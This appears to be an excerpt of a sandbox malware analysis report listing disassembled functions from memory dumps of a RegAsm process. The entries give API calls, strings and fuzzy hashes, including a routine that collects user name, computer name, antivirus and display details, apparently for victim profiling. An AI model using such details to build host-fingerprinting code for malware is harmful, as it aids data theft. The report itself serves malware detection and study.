__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C076069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C076073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C076082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C09148E), ref: 6C076091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C01EE51,00000000,?), ref: 6C0760BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C0760C4

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: bced5dd80944c5392b654798483ab0f45a4be2ca97715faaa33fae03e886c83a
Instruction ID: c57e232418357e64191be88f3bb1d00cb8f55499b08e849ce92f02d2d91b31b0
Opcode Fuzzy Hash: bced5dd80944c5392b654798483ab0f45a4be2ca97715faaa33fae03e886c83a
Instruction Fuzzy Hash: 4921A1B1A002189BDB205F24DC09BAA7BF8FF45628F008568E85A97240CF74A958CFE5

Function 6C060000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C060039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C060041
GetCurrentThreadId.KERNEL32 ref: 6C060075
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C060082
moz_xmalloc.MOZGLUE(00000048), ref: 6C060090
free.MOZGLUE(?), ref: 6C060104
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C06011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C06005B

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 8b3452de89c1b99017e098f72c809cd8c9876ce808220eaa0ae5cced1f08f4f6
Instruction ID: f9c12e900c2eff74cae5cef3f2ecc228a5dbfea64406e43dd1399aef185789fa
Opcode Fuzzy Hash: 8b3452de89c1b99017e098f72c809cd8c9876ce808220eaa0ae5cced1f08f4f6
Instruction Fuzzy Hash: 8F4188B56002549FCB20CF25C840B9ABBF5FF49318F40492AE99A87B50DB31B819CBA5

Function 6C027E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C027EA7
malloc.MOZGLUE(00000001), ref: 6C027EB3

Part of subcall function 6C02CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C02CB49
Part of subcall function 6C02CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C02CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C027EC4
mozalloc_abort.MOZGLUE(?), ref: 6C027F19
malloc.MOZGLUE(?), ref: 6C027F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C027F4D

Strings

d, xrefs: 6C027F89

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: f83920a3218d9423c81d6d8494ed0ef325919daf1c8fb7a1831684c118c9b9b1
Instruction ID: faedd45eb370f585650a57e819989711f2b1279d479273ade775a40367fd1987
Opcode Fuzzy Hash: f83920a3218d9423c81d6d8494ed0ef325919daf1c8fb7a1831684c118c9b9b1
Instruction Fuzzy Hash: AA31F571E0438997DF009B68DC046BEB7B8FFA6218F049329ED4957612FB30A988C390

Function 0040DB7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 453150750-2554083253
Opcode ID: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction ID: be699800860e389eb7f033a368984428232de7924aec9246af203248711cb49e
Opcode Fuzzy Hash: 0591f5e3b86716f88ad539bd5f33fabdaa38383dfe43ffecb2f19c092cffc913
Instruction Fuzzy Hash: 18315D71D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 0041F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041F969

Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F

DName::operator+.LIBCMT ref: 0041F9C2
DName::DName.LIBCMT ref: 0041FA1A

Strings

<ellipsis>, xrefs: 0041FA04
..., xrefs: 0041F9FD, 0041FA09
,..., xrefs: 0041F9AE, 0041F9BA
void, xrefs: 0041FA12
,<ellipsis>, xrefs: 0041F9B5

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48

Function 004212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 004212E7
DName::DName.LIBCMT ref: 004212F3

Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF

UnDecorator::getScopedName.LIBCMT ref: 00421332
DName::operator+=.LIBCMT ref: 0042133C
DName::operator+=.LIBCMT ref: 0042134B
DName::operator+=.LIBCMT ref: 00421357
DName::operator+=.LIBCMT ref: 00421364

Strings

void, xrefs: 00421343

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748

Function 00411563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
ReleaseDC.USER32(00000000,00000000), ref: 00411596
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
wsprintfA.USER32 ref: 004115BB

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%dx%d, xrefs: 004115B5

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction ID: 170008d2b248a6dac6df5cacbd3238be6a4bc1abd9d224a85ffebcf6f0d8f3fd
Opcode Fuzzy Hash: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction Fuzzy Hash: 59F0C832601320BBEB249BA59C0DD9B7EAEEF467A7F005451F605D2160E6B75E4087A0

Function 6C023E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C023EEE
RtlFreeHeap.NTDLL ref: 6C023FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C024006
RtlFreeHeap.NTDLL ref: 6C0240A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C023CCC), ref: 6C0240AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C023CCC), ref: 6C0240C2
RtlFreeHeap.NTDLL ref: 6C024134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C023CCC), ref: 6C024143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C023CCC), ref: 6C024157

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: e6ebc11b293153b8ef6e458a24e22564d15d9b469d7ef053be9afe807a2b700f
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: EEA189B1A01215DFDB50CF68C8C075AB7F5BF48308F6581A9D909AF742D775E886CBA0

Function 6C012030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C033F47,?,?,?,6C033F47,6C031A70,?), ref: 6C01207F
memset.VCRUNTIME140(?,000000E5,6C033F47,?,6C033F47,6C031A70,?), ref: 6C0120DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C033F47,6C031A70,?), ref: 6C01211A
EnterCriticalSection.KERNEL32(6C09E744,?,6C033F47,6C031A70,?), ref: 6C012145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C033F47,6C031A70,?), ref: 6C0121BA
EnterCriticalSection.KERNEL32(6C09E744,?,6C033F47,6C031A70,?), ref: 6C0121E0
LeaveCriticalSection.KERNEL32(6C09E744,?,6C033F47,6C031A70,?), ref: 6C012232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C012253, 6C012268
MOZ_CRASH(), xrefs: 6C01227D

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 6c41067869c7eeb25ac898e22c79b6b92b780da874a2fc99dc28e270720514b8
Instruction ID: cd4e759b3e30aaf02a172d5f188c6028ec811a890081e08f942c8c6b5420fee4
Opcode Fuzzy Hash: 6c41067869c7eeb25ac898e22c79b6b92b780da874a2fc99dc28e270720514b8
Instruction Fuzzy Hash: FD61D531F042168FCB04CEA9C98976EB7F5BF96728F254239E624A7E94D7709D00CB81

Function 6C0148E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C05483A,?), ref: 6C014ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C05483A,?), ref: 6C014AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6C05483A,?), ref: 6C014A82

Part of subcall function 6C02CA10: mozalloc_abort.MOZGLUE(?), ref: 6C02CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C05483A,?), ref: 6C014A97
moz_xmalloc.MOZGLUE(15D4E801,?,6C05483A,?), ref: 6C014A35

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C05483A,?), ref: 6C014A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6C05483A,?), ref: 6C014AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6C05483A,?), ref: 6C014B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6C05483A,?), ref: 6C014B2C

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: d28799d58c62bf861c476066fa021046e665a0f798713bdde907011f3db6f1bc
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 857159B1904706AFCB14CFA8C480AAAB7F5FF09308B54463EE15A9BB51E731F655CB80

Function 6C069D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C068273), ref: 6C069D65
free.MOZGLUE(6C068273,?), ref: 6C069D7C
free.MOZGLUE(?,?), ref: 6C069D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C069E0F
free.MOZGLUE(6C06946B,?,?), ref: 6C069E24
free.MOZGLUE(?,?,?), ref: 6C069E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C069EC8
free.MOZGLUE(6C06946B,?,?,?), ref: 6C069EDF
free.MOZGLUE(?,?,?,?), ref: 6C069EF5

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 843212b829feadb27e2a3d1afe074ee7e075ce14e137b834b6853dd772b10553
Instruction ID: e1ee0754a52ff09d5673640edec03efecd383ad487c09deb4949234b25ed7b2b
Opcode Fuzzy Hash: 843212b829feadb27e2a3d1afe074ee7e075ce14e137b834b6853dd772b10553
Instruction Fuzzy Hash: 4F719EB4909B418BC716CF19C48065BF3F4FF99325B449619E89E9BB12EB30F885CB81

Function 6C06DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C06DDCF

Part of subcall function 6C04FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C04FA4B

Part of subcall function 6C0690E0: free.MOZGLUE(?,00000000,?,?,6C06DEDB), ref: 6C0690FF
Part of subcall function 6C0690E0: free.MOZGLUE(?,00000000,?,?,6C06DEDB), ref: 6C069108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C06DE0D
free.MOZGLUE(00000000), ref: 6C06DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C06DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C06DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C06DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C05DEFD,?,6C024A68), ref: 6C06DF32

Part of subcall function 6C06DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C06DB86
Part of subcall function 6C06DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C06DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C05DEFD,?,6C024A68), ref: 6C06DF65
free.MOZGLUE(?), ref: 6C06DF80

Part of subcall function 6C035E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C035EDB
Part of subcall function 6C035E90: memset.VCRUNTIME140(6C077765,000000E5,55CCCCCC), ref: 6C035F27
Part of subcall function 6C035E90: LeaveCriticalSection.KERNEL32(?), ref: 6C035FB2

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 4019c4c12b968d30ca5441e3661237169c39af06bc16b4ba1f8f0c0c4b0fa5fb
Instruction ID: dfa9aed8da4101c43d783cc3827998df09a1b9044a9881dbc4c1843589bc2c20
Opcode Fuzzy Hash: 4019c4c12b968d30ca5441e3661237169c39af06bc16b4ba1f8f0c0c4b0fa5fb
Instruction Fuzzy Hash: 5F51D276A017119BD720AF2AD8807AEB3F6BF95308FA5051CD85A53F10DB31F919CB82

Function 6C075D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075DC9
std::_Facet_Register.LIBCPMT ref: 6C075DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C075C8C,?,6C04E829), ref: 6C075E45

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

